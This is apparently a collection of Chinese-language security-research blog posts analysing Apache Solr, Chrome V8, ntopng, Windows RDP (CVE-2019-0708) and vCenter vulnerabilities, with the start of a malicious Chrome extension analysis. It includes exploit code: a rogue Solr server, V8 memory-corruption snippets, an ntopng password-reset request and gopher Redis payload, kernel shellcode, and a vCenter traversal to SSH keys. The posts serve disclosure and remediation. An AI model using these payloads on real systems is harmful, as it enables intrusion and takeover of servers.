Apache Solr 8.8.1 SSRF to Arbitrary File Write Vulnerability

0x04. Exploit 编写

类似于 Redis Replication 的 Exploit,我们也需要编写一个 Rogue Solr Server,需要实现几种 commands,包括 indexversionfilelist 以及 filecontent。部分代码如下:

if (data.contains("command=indexversion")) {
    response = SolrResponse.makeIndexResponse().toByteArray();
} else if (data.contains("command=filelist")) {
    response = SolrResponse.makeFileListResponse().toByteArray();
} else if (data.contains("command=filecontent")) {
    response = SolrResponse.makeFileContentResponse().toByteArray();
} else {
    response = "Hello World".getBytes();
}

t.getResponseHeaders().add("Content-Type", "application/octet-stream");
t.sendResponseHeaders(200, response.length);
OutputStream os = t.getResponseBody();
os.write(response);
os.close()

返回恶意文件的代码如下:

public static ByteArrayOutputStream makeFileListResponse() throws IOException {
    ByteArrayOutputStream outputStream = new ByteArrayOutputStream();
    JavaBinCodec codec = new JavaBinCodec(null);

    NamedList<Object> values = new SimpleOrderedMap<>();
    NamedList<Object> headers = new SimpleOrderedMap<>();
    headers.add("status", 0);
    headers.add("QTime", 1);

    values.add("responseHeader", headers);

    HashMap<String, Object> file = new HashMap<>();
    file.put("size", new Long(String.valueOf((new File(FILE_NAME)).length())));
    file.put("lastmodified", new Long("123456"));
    file.put("name", DIST_FILE);

    ArrayList<HashMap<String, Object>> fileList = new ArrayList<>();
    fileList.add(file);

    HashMap<String, Object> file2 = new HashMap<>();
    file2.put("size", new Long(String.valueOf((new File(FILE_NAME)).length())));
    file2.put("lastmodified", new Long("123456"));
    file2.put("name", DIST_FILE);

    ArrayList<HashMap<String, Object>> fileList2 = new ArrayList<>();
    fileList2.add(file2);

    values.add("confFiles", fileList);
    values.add("filelist", fileList2);

    codec.marshal(values, outputStream);
    return outputStream;

其中 DIST_FILE 为攻击者传入的参数,比如传入 ../../../../../../../../tmp/pwn.txt,而 FILE_NAME 是本地要写入的文件的路径。攻击效果如下:

Apache Solr 8.8.1 SSRF to Arbitrary File Write Vulnerability

Chromium V8 JavaScript引擎远程代码执行漏洞分析讨论

By: frust
15 April 2021 at 07:35

0x01-概述

2021年4月13日,安全研究人员Rajvardhan Agarwal在推特公布了本周第一个远程代码执行(RCE)的0Day漏洞,该漏洞可在当前版本(89.0.4389.114)的谷歌Chrome浏览器上成功触发。Agarwal公布的漏洞,是基于Chromium内核的浏览器中V8 JavaScript引擎的远程代码执行漏洞,同时还发布了该漏洞的PoC

2021年4月14日,360高级攻防实验室安全研究员frust公布了本周第二个Chromium 0day(Issue 1195777)以及Chrome 89.0.4389.114的poc视频验证。该漏洞会影响当前最新版本的Google Chrome 90.0.4430.72,以及Microsoft Edge和其他可能基于Chromium的浏览器。

Chrome浏览器沙盒可以拦截该漏洞。但如果该漏洞与其他漏洞进行组合,就有可能绕过Chrome沙盒。

0x02-漏洞PoC

目前四个漏洞issue 1126249issue 1150649、issue 1196683、issue 1195777的exp均使用同一绕过缓解措施手法(截至文章发布,后两个issue尚未公开),具体细节可参考文章

基本思路是创建一个数组,然后调用shift函数构造length为-1的数组,从而实现相对任意地址读写。issue 1196683中关键利用代码如下所示。

function foo(a) {
......
	if(x==-1) x = 0;
	var arr = new Array(x);//---------------------->构造length为-1数组
	arr.shift();
......
}

issue 1195777中关键利用代码如下所示:

function foo(a) {
    let x = -1;
    if (a) x = 0xFFFFFFFF;
    var arr = new Array(Math.sign(0 - Math.max(0, x, -1)));//---------------------->构造length为-1数组
    arr.shift();
    let local_arr = Array(2);
    ......
}

参考issue 1126249issue 1150649中关键poc代码如下所示,其缓解绕过可能使用同一方法。

//1126249
function jit_func(a) {
	.....
    v5568 = Math.sign(v19229) < 0|0|0 ? 0 : v5568;
    let v51206 = new Array(v5568);
    v51206.shift();
    Array.prototype.unshift.call(v51206);
    v51206.shift();
   .....
}

//1150649
function jit_func(a, b) {
  ......
  v56971 = 0xfffffffe/2 + 1 - Math.sign(v921312 -(-0x1)|6328);
  if (b) {
    v56971 = 0;
  }
  v129341 = new Array(Math.sign(0 - Math.sign(v56971)));
  v129341.shift();
  v4951241 = {};
  v129341.shift();
  ......
}

国内知名研究员gengming@dydhh1推特发文将在zer0pwn会议发表议题讲解CVE-2020-1604[0|1]讲过如何绕过缓解机制。本文在此不再赘述。

frust在youtube给出了Chrome89.0.4389.114的poc视频验证;经测试最新版Chrome 90.0.4430.72仍旧存在该漏洞。

0x03-exp关键代码

exp关键代码如下所示。

class LeakArrayBuffer extends ArrayBuffer {
        constructor(size) {
            super(size);
            this.slot = 0xb33f;//进行地址泄露
        }
    }
function foo(a) {
        let x = -1;
        if (a) x = 0xFFFFFFFF;
        var arr = new Array(Math.sign(0 - Math.max(0, x, -1)));//构造长度为-1的数组
        arr.shift();
        let local_arr = Array(2);
        local_arr[0] = 5.1;//4014666666666666
        let buff = new LeakArrayBuffer(0x1000);//
        arr[0] = 0x1122;//修改数组长度
        return [arr, local_arr, buff];
    }
    for (var i = 0; i < 0x10000; ++i)
        foo(false);
    gc(); gc();
    [corrput_arr, rwarr, corrupt_buff] = foo(true);

通过代码Array(Math.sign(0 - Math.max(0, x, -1)))创建一个length为-1的数组,然后使用LeakArrayBuffer构造内存布局,将相对读写布局成绝对读写。

这里需要说明的是,由于chrome80以上版本启用了地址压缩,地址高4个字节,可以在构造的array后面的固定偏移找到。

先将corrupt_buffer的地址泄露,然后如下计算地址

 (corrupt_buffer_ptr_low & 0xffff0000) - ((corrupt_buffer_ptr_low & 0xffff0000) % 0x40000) + 0x40000;

可以计算出高4字节。

同时结合0x02步骤中实现的相对读写和对象泄露,可实现绝对地址读写。@r4j0x00在issue 1196683中构造length为-1数组后,则通过伪造对象实现任意地址读写。

之后,由于WASM内存具有RWX权限,因此可以将shellcode拷贝到WASM所在内存,实现任意代码执行。

具体细节参考exp

该漏洞目前已修复

0x04-小结

严格来说,此次研究人员公开的两个漏洞并非0day,相关漏洞在最新的V8版本中已修复,但在公开时并未merge到最新版chrome中。由于Chrome自身拥有沙箱保护,该漏洞在沙箱内无法被成功利用,一般情况下,仍然需要配合提权或沙箱逃逸漏洞才行达到沙箱外代码执行的目的。但是,其他不少基于v8等组件的app(包括安卓),尤其是未开启沙箱保护的软件,仍具有潜在安全风险。

漏洞修复和应用代码修复之间的窗口期为攻击者提供了可乘之机。Chrome尚且如此,其他依赖v8等组件的APP更不必说,使用1 day甚至 N day即可实现0 day效果。这也为我们敲响警钟,不仅仅是安全研究,作为应用开发者,也应当关注组件漏洞并及时修复,避免攻击者趁虚而入。

我们在此也敦促各大软件厂商、终端用户、监管机构等及时采取更新、防范措施;使用Chrome的用户需及时更新,使用其他Chrome内核浏览器的用户则需要提高安全意识,防范攻击。

参考链接

https://chromium-review.googlesource.com/c/v8/v8/+/2826114/3/src/compiler/representation-change.cc

https://bugs.chromium.org/p/chromium/issues/attachmentText?aid=476971

https://bugs.chromium.org/p/chromium/issues/detail?id=1150649

https://bugs.chromium.org/p/chromium/issues/attachmentText?aid=465645

https://bugs.chromium.org/p/chromium/issues/detail?id=1126249

https://github.com/avboy1337/1195777-chrome0day/blob/main/1195777.html

https://github.com/r4j0x00/exploits/blob/master/chrome-0day/exploit.js

ntopng 流量分析工具多个漏洞分析

By: RicterZ
24 March 2021 at 03:37

0x00. TL;DR

ntopng 是一套开源的网络流量监控工具,提供基于 Web 界面的实时网络流量监控。支持跨平台,包括 Windows、Linux 以及 MacOS。ntopng 使用 C++ 语言开发,其绝大部分 Web 逻辑使用 lua 开发。

在针对 ntopng 的源码进行审计的过程中,笔者发现了 ntopng 存在多个漏洞,包括一个权限绕过漏洞、一个 SSRF 漏洞和多个其他安全问题,接着组合利用这些问题成功实现了部分版本的命令执行利用和管理员 Cookie 伪造。

比较有趣的是,利用的过程涉及到 SSDP 协议、gopher scheme 和奇偶数,还有极佳的运气成分。ntopng 已经针对这些漏洞放出补丁,并在 4.2 版本进行修复。涉及漏洞的 CVE 如下:

  • CVE-2021-28073
  • CVE-2021-28074

0x01. 部分权限绕过 (全版本)

ntopng 的 Web 界面由 Lua 开发,对于 HTTP 请求的处理、认证相关的逻辑由后端 C++ 负责,文件为 HTTPserver.cpp。对于一个 HTTP 请求来说,ntopng 的主要处理逻辑代码都在 handle_lua_request 函数中。其 HTTP 处理逻辑流程如下:

  1. 检测是不是某些特殊路径,如果是直接返回相关逻辑结束函数;
  2. 检测是不是白名单路径,如果是则储存在 whitelisted 变量中;
  3. 检测是否是静态资源,通过判断路径最后的扩展名,如果不是则进入认证逻辑,认证不通过结束函数;
  4. 检测是否路径以某些特殊路径开头,如果是则调用 Lua 解释器,逻辑交由 Lua 层;
  5. 以上全部通过则判断为静态文件,函数返回,交由 mongoose 处理静态文件。

针对一个非白名单内的 lua 文件,是无法在通过认证之前到达的,因为无法通过判断是否是静态文件的相关逻辑。同时为了使我们传入的路径进入调用 LuaEngine::handle_script_request 我们传入的路径需要以 /lua/ 或者 /plugins/ 开头,以静态文件扩展名结尾,比如 .css 或者 .js

// HTTPserver.cpp
if(!isStaticResourceUrl(request_info, len)) {
    ...
}

if((strncmp(request_info->uri, "/lua/", 5) == 0)
 || (strcmp(request_info->uri, "/metrics") == 0)
 || (strncmp(request_info->uri, "/plugins/", 9) == 0)
 || (strcmp(request_info->uri, "/") == 0)) {
 ...

进入 if 语句后,ntopng 声明了一个 大小为 255 的字符串数组 来储存用户请求的文件路径。并针对以非 .lua 扩展名结尾的路径后补充了 .lua,接着调用 stat 函数判断此路径是否存在。如果存在则调用 LuaEngine::handle_script_request 来进行处理。

// HTTPserver.cpp
/* Lua Script */
char path[255] = { 0 }, uri[2048];
struct stat buf;
bool found;

...
if(strlen(path) > 4 && strncmp(&path[strlen(path) - 4], ".lua", 4))
    snprintf(&path[strlen(path)], sizeof(path) - strlen(path) - 1, "%s", 
    (char*)".lua");

ntop->fixPath(path);
found = ((stat(path, &buf) == 0) && (S_ISREG(buf.st_mode))) ? true : false;

if(found) {
    ...
    l = new LuaEngine(NULL);
    ...
    l->handle_script_request(conn, request_info, path, &attack_attempt, username,
                             group, csrf, localuser);

ntopng 调用 snprintf 将用户请求的 URI 写入到 path 数组中,而 snprintf 会在字符串结尾添加 \0。由于 path 数组长度有限,即使用户传入超过 255 个字符的路径,也只会写入前 254 个字符,我们可以通过填充 ./ 来构造一个长度超过 255 但是合法的路径,并利用长度限制来截断后面的 .css.lua,即可绕过 ntopng 的认证以访问部分 Lua 文件。

目前有两个问题,一个是为什么只能用 ./ 填充,另外一个是为什么说是“部分 Lua 文件”。

第一个问题,在 thrid-party/mongoose/mongoose.c 中,进行路径处理之前会调用下面的函数去除重复的 /以及 .,导致我们只能用 ./ 来填充。

void remove_double_dots_and_double_slashes(char *s) {
    char *p = s;

    while (*s != '\0') {
        *p++ = *s++;
        if (s[-1] == '/' || s[-1] == '\\') {
            // Skip all following slashes, backslashes and double-dots
            while (s[0] != '\0') {
                if (s[0] == '/' || s[0] == '\\') {
                    s++;
                } else if (s[0] == '.' && s[1] == '.') {
                    s += 2;
                } else {
                    break;
                }
            }
        }
    }
    *p = '\0';
}

说部分 Lua 文件的原因为,由于我们只能利用两个字符 ./ 来进行路径填充,。那么针对前缀长度为偶数的路径,我们只能访问路径长度为偶数的路径,反之亦然。因为一个偶数加一个偶数要想成为偶数必然需要再加一个偶数。也就是说,我们需要:

len("/path/to/ntopng/lua/") + len("./") * padding + len("path/to/file") = 255 - 1

0x02. 全局权限绕过 (版本 4.1.x-4.3.x)

其实大多数 ntopng 的安装路径都是偶数(/usr/share/ntopng/scripts/lua/),那么我们需要一个合适的 gadgets 来使我们执行任意 lua 文件。通过对 lua 文件的审计,我发现 modules/widgets_utils.lua内存在一个合适的 gadgets:

// modules/widgets_utils.lua
function widgets_utils.generate_response(widget, params)
   local ds = datasources_utils.get(widget.ds_hash)
   local dirs = ntop.getDirs()
   package.path = dirs.installdir .. "/scripts/lua/datasources/?.lua;" .. package.path

   -- Remove trailer .lua from the origin
   local origin = ds.origin:gsub("%.lua", "")

   -- io.write("Executing "..origin..".lua\n")
   --tprint(widget)

   -- Call the origin to return
   local response = require(origin)

调用入口在 widgets/widget.lua,很幸运,这个文件名长度为偶数。通过阅读代码逻辑可知,我们需要在edit_widgets.lua 创建一个 widget,而创建 widget 有需要存在一个 datasource,在 edit_datasources.lua 创建。而这两个文件的文件名长度全部为偶数,所以我们可以利用请求这几个文件,从而实现任意文件包含的操作,从而绕过 ntopng 的认证。

0x03. Admin 密码重置利用 (版本 2.x)

利用 0x01 的认证绕过,请求 admin/password_reset.lua 即可更改管理员的密码。

GET /lua/.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f
.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.
%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%
2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2
f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f
.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2fadmin/password_reset.lua.css?confirm_new_
password=123&new_password=123&old_password=0&username=admin HTTP/1.1
Host: 127.0.0.1:3000
Cookie: user=admin
Connection: close

0x04. 利用主机发现功能伪造 Session (版本 4.1.x-4.3.x)

ntopng 的主机发现功能利用了 SSDP(Simple Service Discovery Protocol)协议去发现内网中的设备。

SSDP 协议进行主机发现的流程如下所示:

+----------------------+
|      SSDP Client     +<--------+
+-----------+----------+         |
            |                    |
        M-SEARCH          HTTP/1.1 200 OK
            v                    |
+-----------+----------+         |
| 239.255.255.250:1900 |         |
+---+--------------+---+         |
    |              |             |
    v              v             |
+---+-----+  +-----+---+         |
| DEVICES |  | DEVICES |         |
+---+-----+  +-----+---+         |
    |              |             |
    +--------------+-------------+

SSDP 协议在 UDP 层传输,协议格式基于 HTTPU(在 UDP 端口上传输 HTTP 协议)。SSDP 客户端向多播地址239.255.255.250 的 1900 端口发送 M-SEARCH 的请求,局域网中加入此多播地址的设备接收到请求后,向客户端回复一个 HTTP/1.1 200 OK,在 HTTP Headers 里有与设备相关的信息。其中存在一个 Location 字段,一般指向设备的描述文件。

// modules/discover_utils.lua
function discover.discover2table(interface_name, recache)
    ...
    local ssdp = interface.discoverHosts(3)
    ...
    ssdp = analyzeSSDP(ssdp)
    ...

local function analyzeSSDP(ssdp)
   local rsp = {}

   for url,host in pairs(ssdp) do
      local hresp = ntop.httpGet(url, "", "", 3 --[[ seconds ]])
      ...

在 discover_utils.lua 中,Lua 会调用 discoverHosts 函数获取 SSDP 发现的设备信息,然后在analyzeSSDP 函数中请求 Location 头所指向的 URL。那么这里显然存在一个 SSRF 漏洞。ntop.httpGet最终调用到的方法为 Utils::httpGetPost,而这个方法又使用了 cURL 进行请求。

// Utils.cpp
bool Utils::httpGetPost(lua_State* vm, char *url, char *username,
            char *password, int timeout,
            bool return_content,
            bool use_cookie_authentication,
            HTTPTranferStats *stats, const char *form_data,
            char *write_fname, bool follow_redirects, int ip_version) {
  CURL *curl;
  FILE *out_f = NULL;
  bool ret = true;

  curl = curl_easy_init();

众所周知,cURL 是支持 gopher:// 协议的。ntopng 使用 Redis 储存 Session 的相关信息,那么利用SSRF 攻击本地的 Redis 即可设置 Session,最终实现认证绕过。

discover.discover2table 的调用入口在 discover.lua,也是一个偶数长度的文件名。于是通过请求此文件触发主机发现功能,同时启动一个 SSDP Server 去回复 ntopng 发出的 M-SEARCH 请求,并将 Location设置为如下 payload:

gopher://127.0.0.1:6379/_SET%20sessions.ntop%20%22admin|...%22%0d%0aQUIT%0d%0a

最终通过设置 Cookie 为 session=ntop 来通过认证。

0x05. 利用主机发现功能实现 RCE (版本 3.8-4.0)

原理同 0x04,利用点在 assistant_test.lua 中,需要设置 ntopng.prefs.telegram_chat_id 以及 ntopng.prefs.telegram_bot_token,利用 SSRF 写入 Redis 即可。

local function send_text_telegram(text) 
  local chat_id, bot_token = ntop.getCache("ntopng.prefs.telegram_chat_id"), 
  ntop.getCache("ntopng.prefs.telegram_bot_token")

    if( string.len(text) >= 4096 ) then 
      text = string.sub( text, 1, 4096 )
    end

    if (bot_token and chat_id) and (bot_token ~= "") and (chat_id ~= "") then 
      os.execute("curl -X POST  https://api.telegram.org/bot"..bot_token..
      "/sendMessage -d chat_id="..chat_id.." -d text=\" " ..text.." \" ")
      return 0

    else
      return 1
    end
end

0x06. 利用主机发现功能实现 RCE (版本 3.2-3.8)

原理同 0x04,利用点在 modules/alert_utils.lua 中,需要在 Redis 里设置合适的 threshold。

local function entity_threshold_crossed(granularity, old_table, new_table, threshold)
   local rc
   local threshold_info = table.clone(threshold)

   if old_table and new_table then -- meaningful checks require both new and old tables
      ..
      -- This is where magic happens: load() evaluates the string
      local what = "val = "..threshold.metric.."(old, new, duration); if(val ".. op .. " " ..
       threshold.edge .. ") then return(true) else return(false) end"

      local f = load(what)
      ...

0x07. 在云主机上进行利用

SSDP 通常是在局域网内进行数据传输的,看似不可能针对公网的 ntopng 进行攻击。但是我们根据 0x04 中所提及到的 SSDP 的运作方式可知,当 ntopng 发送 M-SEARCH 请求后,在 3s 内向其隐式绑定的 UDP 端口发送数据即可使 ntopng 成功触发漏洞。

// modules/discover_utils.lua: local ssdp = interface.discoverHosts(3) <- timeout
if(timeout < 1) timeout = 1;

tv.tv_sec = timeout;
tv.tv_usec = 0;
..

while(select(udp_sock + 1, &fdset, NULL, NULL, &tv) > 0) {
    struct sockaddr_in from = { 0 };
    socklen_t s = sizeof(from);
    char ipbuf[32];
    int len = recvfrom(udp_sock, (char*)msg, sizeof(msg), 0, (sockaddr*)&from, &s);
    ..

针对云主机,如 Google Compute Engine、腾讯云等,其实例的公网 IP 实际上是利用 NAT 来进行与外部网络的通信的。即使绑定在云主机的内网 IP 地址上(如 10.x.x.x),在流量经过 NAT 时,dst IP 也会被替换为云主机实例的内网 IP 地址,也就是说,我们一旦知道其与 SSDP 多播地址 239.255.255.250 通信的 UDP 端口,即使不在同一个局域网内,也可以使之接收到我们的 payload,以触发漏洞。

针对 0x04,我们可以利用 rest/v1/get/flow/active.lua 来获取当前 ntopng 服务器与 239.255.255.250 通信的端口,由于这个路径长度为奇数,所以我们需要利用 0x02 中提及到的任意 lua 文件包含来进行利用。

同时,由于 UDP 通信的过程中此端口是隐式绑定的,且并没有进行来源验证,所以一旦获取到这个端口号,则可以向此端口发送 SSDP 数据包,以混淆真实的 SSDP 回复。需要注意的是,需要在触发主机功能的窗口期内向此端口发送数据,所以整个攻击流程如下:

  1. 触发主机发现功能;
  2. 循环请求 rest/v1/get/flow/active.lua 以获取端口;
  3. 再次触发主机发现功能;
  4. 向目标从第 2 步获取到的 UDP 端口发送 payload;
  5. 尝试利用 Cookie 进行登录以绕过认证。

针对 0x05,我们可以利用 get_flows_data.lua 来获取相关的 UDP 端口,原理不再赘述。

0x07. Conclusion

为什么出问题的文件名长度都是偶数啊.jpg

CVE-2019-0708 漏洞在 Windows Server 2008 R2 上的利用分析

By: yyjb
27 February 2021 at 07:06

分析背景

cve-2019-0708是2019年一个rdp协议漏洞,虽然此漏洞只存在于较低版本的windows系统上,但仍有一部分用户使用较早版本的系统部署服务器(如Win Server 2008等),该漏洞仍有较大隐患。在此漏洞发布补丁之后不久,msf上即出现公开的可利用代码;但msf的利用代码似乎只针对win7,如果想要在Win Server 2008 R2上利用成功的话,则需要事先在目标机上手动设置注册表项。

在我们实际的渗透测试过程中,发现有部分Win Server 2008服务器只更新了永恒之蓝补丁,而没有修复cve-2019-0708。因此,我们尝试是否可以在修补过永恒之蓝的Win Server 2008 R2上实现一个更具有可行性的cve-2019-0708 EXP。

由于该漏洞已有大量的详细分析和利用代码,因此本文对漏洞原理和公开利用不做赘述。

分析过程

我们分析了msf的exp代码,发现公开的exp主要是利用大量Client Name内核对象布局内核池。这主要有两个目的,一是覆盖漏洞触发导致MS_T120Channel对象释放后的内存,构造伪造的Channel对象;二是直接将最终的的shellcode布局到内核池。然后通过触发IcaChannelInputInternal中Channel对象在其0x100偏移处的虚函数指针引用来达到代码执行的目的。如图1:

图1

而这种利用方式并不适用于server2008r2。我们分析了server2008r2的崩溃情况,发现引起崩溃的原因是第一步,即无法使用Client Name对象伪造channel对象,从而布局失败。这是因为在默认设置下,server 2008 r2的
RDPSND/MS_T120 channel对象不能接收客户端Client Name对象的分片数据。根据MSF的说明(见图2),只有发送至RDPSND/MS_T120的分片信息才会被正确处理;win7以上的系统不支持MS_T120,而RDPSND在server 2008 r2上并不是默认开启的因此,我们需要寻找其他可以伪造channel对象的方式。

图2 MSF利用代码中针对EXP的说明

在此期间,我们阅读了几篇详细分析cve-2019-0708的文章(见参考链接),结合之前的调试分析经历,我们发现的确可以利用RDPDR 的channelID(去掉MSF中对rdp_on_core_client_id_confirm函数的target_channel_id加一的操作即可)使Client Name成功填充MS_T120 channel对象,但使用RDPDR 有一个缺陷:RDPDR Client Name对象只能申请有限的次数,基本上只能完成MS_T120对象的伪造占用并触发虚函数任意指针执行,无法完成后续的任意地址shellcode布局。

图3

我们再次研究了Unit 42发布的报告,他们利用之前发布的文章中提到的Refresh Rect PDU对象来完成内核池的大范围布局(如图,注:需要在RDP Connection Sequence之后才能发送这个结构)。虽然这种内存布局方式每次只能控制8个字节,但作者利用了一个十分巧妙的方式,最终在32位系统上完成漏洞利用。

图4

在解释这种巧妙利用之前,我们需要补充此漏洞目前的利用思路:得到一个任意指针执行的机会后,跳转到该指针指向的地址中,之后开始执行代码。但在内核中,我们能够控制的可预测地址只有这8个字节。虽然此时其中一个寄存器的固定偏移上保存有一个可以控制的伪造对象地址,但至少需要一条语句跳转过去。

而文章作者就是利用了在32位系统上地址长度只有4字节的特性,以及一条极短的汇编语句add bl,al; jmp ebx,这两个功能的代码合起来刚好在8字节的代码中完成。之后通过伪造channel对象里面的第二阶段跳转代码再次跳转到最后的shellcode上。(具体参考Unite 42的报告

我们尝试在64位系统上复现这种方法。通过阅读微软对Refresh Rect PDU描述的官方文档以及msf的rdp.rb文件中对rdp协议的详细注释,我们了解到,申请Refresh Rect PDU对象的次数很多,能够满足内核池布局大小的需求,但在之后多次调试分析后发现,这种方法在64位系统上的实现有一些问题:在64位系统上,仅地址长度就达到了8字节。我们曾经考虑了一种更极端的方式,将内核地址低位上的可变的几位复用为跳转语句的一部分,但由于内核池地址本身的大小范围,这里最多控制低位上的7位,即:

0xfffffa801“8c08000“ 7位可控

另外,RDPDR Client Name对象的布局的可控数据位置本身也是固定的(即其中最低的两位也是固定的),这样我们就只有更少的5位来实现第二阶段的shellcode跳转,即:

“8c080”0xfffffa801“8c080”00 5位可控,

由于伪造的channel对象中真正可用于跳转的地址和寄存器之间仍有计算关系,所以这种方法不可行,需要考虑其他的思路。

把利用的条件和思路设置得更宽泛一些,我们想到,如果目前rdp协议暂时不能找到这样合适的内核池布局方式,那其他比较容易获取的也比较通用的协议呢?结合以前分析过的协议类的多种代码执行漏洞,smb中有一个用得比较多的内核池布局方式srvnet对象。

无论是永恒之蓝还是之后的SMBGhost都使用到srvnet对象进行内存布局。最容易的方法可以借助于msf中ms17-010的代码,通过修改代码中对make_smb2_payload_headers_packetmake_smb2_payload_body_packet 大小和数据的控制,能够比较容易地获取一种稳定的内核池布局方式(相关代码参考图5)。

图5

由于单个Client Name Request所申请的大小不足以存放一个完整的shellcode,并且如上面提到的,也不能申请到足够多的RDPDR Client Name来布局内核池空间,所以我们选择将最终的shellcode直接布局到srvnet申请的内核池结构中,而不是将其当作一个跳板,这样也简化了整个漏洞的利用过程。

最后需要说明一下shellcode的调试。ms17-010中的shellcode以及0708中的shellcode都有一部分是根据实际需求定制的,不能直接使用。0708中的shellcode受限于RDPDR Client Name大小的限制,需要把shellcode的内核模块和用户层模块分为两个部分,每部分shellcode头部还带有自动搜索另一部分shellcode的代码。为了方便起见,我们直接使用ms17-010中的shellcode,其中只需要修改一处用来保存进程信息对象结构的固定偏移地址。之后,我们仍需要在shellcode中添加文章中安全跳过IcaChannelInputInternal函数剩余部分可能崩溃的代码(参考Patch Kernel to Avoid Crash 章节),即可使整个利用正常工作。64位中添加的修补代码如下:

mov qword ptr[rbx+108h],0
mov rax,qword ptr[rsp]
add rax,440h
mov qword ptr[rsp],rax
mov r11,qword ptr gs:[188h]
add word ptr [r11+1C4h],1

总结

本篇文章主要是分享我们在分析CVE-2019-0708漏洞利用的过程中整合现有的一些方法和技术去解决具体实际问题的思路。但这种方法也会有一些限制,例如既然使用了smb协议中的一些内核对布局方式,则前提是需要目标开启了smb端口。另外,不同虚拟化平台下的目标内核基址需要预测来达到使exp通用的问题仍没有解决,但由于这个漏洞是2019年的,从到目前为止众多已经修补过的rdp信息泄露漏洞中泄露一个任意内核对象地址,应该不会是太难的一件事。

综上,我们建议用户尽量使用最新的操作系统来保证系统安全性,如果的确出于某些原因要考虑较早版本且不受微软安全更新保护的系统,也尽量将补丁打全,至少可以降低攻击者攻击成功的方法和机会。

参考链接

CVE-2021-21972 vCenter Server 文件写入漏洞分析

By: RicterZ
24 February 2021 at 08:59

0x01. 漏洞简介

vSphere 是 VMware 推出的虚拟化平台套件,包含 ESXi、vCenter Server 等一系列的软件。其中 vCenter Server 为 ESXi 的控制中心,可从单一控制点统一管理数据中心的所有 vSphere 主机和虚拟机,使得 IT 管理员能够提高控制能力,简化入场任务,并降低 IT 环境的管理复杂性与成本。

vSphere Client(HTML5)在 vCenter Server 插件中存在一个远程执行代码漏洞。未授权的攻击者可以通过开放 443 端口的服务器向 vCenter Server 发送精心构造的请求,从而在服务器上写入 webshell,最终造成远程任意代码执行。

0x02. 影响范围

  • vmware:vcenter_server 7.0 U1c 之前的 7.0 版本
  • vmware:vcenter_server 6.7 U3l 之前的 6.7 版本
  • vmware:vcenter_server 6.5 U3n 之前的 6.5 版本

0x03. 漏洞影响

VMware已评估此问题的严重程度为 严重 程度,CVSSv3 得分为 9.8

0x04. 漏洞分析

vCenter Server 的 vROPS 插件的 API 未经过鉴权,存在一些敏感接口。其中 uploadova 接口存在一个上传 OVA 文件的功能:

    @RequestMapping(
        value = {"/uploadova"},
        method = {RequestMethod.POST}
    )
    public void uploadOvaFile(@RequestParam(value = "uploadFile",required = true) CommonsMultipartFile uploadFile, HttpServletResponse response) throws Exception {
        logger.info("Entering uploadOvaFile api");
        int code = uploadFile.isEmpty() ? 400 : 200;
        PrintWriter wr = null;
...
        response.setStatus(code);
        String returnStatus = "SUCCESS";
        if (!uploadFile.isEmpty()) {
            try {
                logger.info("Downloading OVA file has been started");
                logger.info("Size of the file received  : " + uploadFile.getSize());
                InputStream inputStream = uploadFile.getInputStream();
                File dir = new File("/tmp/unicorn_ova_dir");
                if (!dir.exists()) {
                    dir.mkdirs();
                } else {
                    String[] entries = dir.list();
                    String[] var9 = entries;
                    int var10 = entries.length;

                    for(int var11 = 0; var11 < var10; ++var11) {
                        String entry = var9[var11];
                        File currentFile = new File(dir.getPath(), entry);
                        currentFile.delete();
                    }

                    logger.info("Successfully cleaned : /tmp/unicorn_ova_dir");
                }

                TarArchiveInputStream in = new TarArchiveInputStream(inputStream);
                TarArchiveEntry entry = in.getNextTarEntry();
                ArrayList result = new ArrayList();

代码逻辑是将 TAR 文件解压后上传到 /tmp/unicorn_ova_dir 目录。注意到如下代码:

                while(entry != null) {
                    if (entry.isDirectory()) {
                        entry = in.getNextTarEntry();
                    } else {
                        File curfile = new File("/tmp/unicorn_ova_dir", entry.getName());
                        File parent = curfile.getParentFile();
                        if (!parent.exists()) {
                            parent.mkdirs();

直接将 TAR 的文件名与 /tmp/unicorn_ova_dir 拼接并写入文件。如果文件名内存在 ../ 即可实现目录遍历。

对于 Linux 版本,可以创建一个包含 ../../home/vsphere-ui/.ssh/authorized_keys 的 TAR 文件并上传后利用 SSH 登陆:

$ ssh 192.168.1.34 -lvsphere-ui

VMware vCenter Server 7.0.1.00100

Type: vCenter Server with an embedded Platform Services Controller

vsphere-ui@bogon [ ~ ]$ id
uid=1016(vsphere-ui) gid=100(users) groups=100(users),59001(cis)

针对 Windows 版本,可以在目标服务器上写入 JSP webshell 文件,由于服务是 System 权限,所以可以任意文件写。

0x05. 漏洞修复

升级到安全版本:

  • vCenter Server 7.0 版本升级到 7.0.U1c

  • vCenter Server 6.7版本升级到 6.7.U3l

  • vCenter Server 6.5版本升级到 6.5 U3n

临时修复建议

(针对暂时无法升级的服务器)

  1. SSH远连到vCSA(或远程桌面连接到Windows VC)

  2. 备份以下文件:

    • Linux系统文件路径为:/etc/vmware/vsphere-ui/compatibility-matrix.xml (vCSA)

    • Windows文件路径为:C:\ProgramData\VMware\vCenterServer\cfg\vsphere-ui (Windows VC)

  3. 使用文本编辑器将文件内容修改为: 640

  4. 使用vmon-cli -r vsphere-ui命令重启vsphere-ui服务

  5. 访问https:///ui/vropspluginui/rest/services/checkmobregister,显示404错误 640--1--1

  6. 在vSphere Client的Solutions->Client Plugins中VMWare vROPS插件显示为incompatible 640--2-

0x06. 参考链接

隐藏在 Chrome 中的窃密者

By: gaoya
23 October 2020 at 09:43

概述

近日,有reddit用户反映,拥有100k+安装的Google Chrome扩展程序 User-Agent Switcher存在恶意点赞facebook/instagram照片的行为。

除User-Agent Switcher以外,还有另外两个扩展程序也被标记为恶意的,并从Chrome商店中下架。

目前已知受影响的扩展程序以及版本:

  • User-Agent Switcher
    • 2.0.0.9
    • 2.0.1.0
  • Nano Defender
    • 15.0.0.206
  • Nano Adblocker
    • 疑为 1.0.0.154

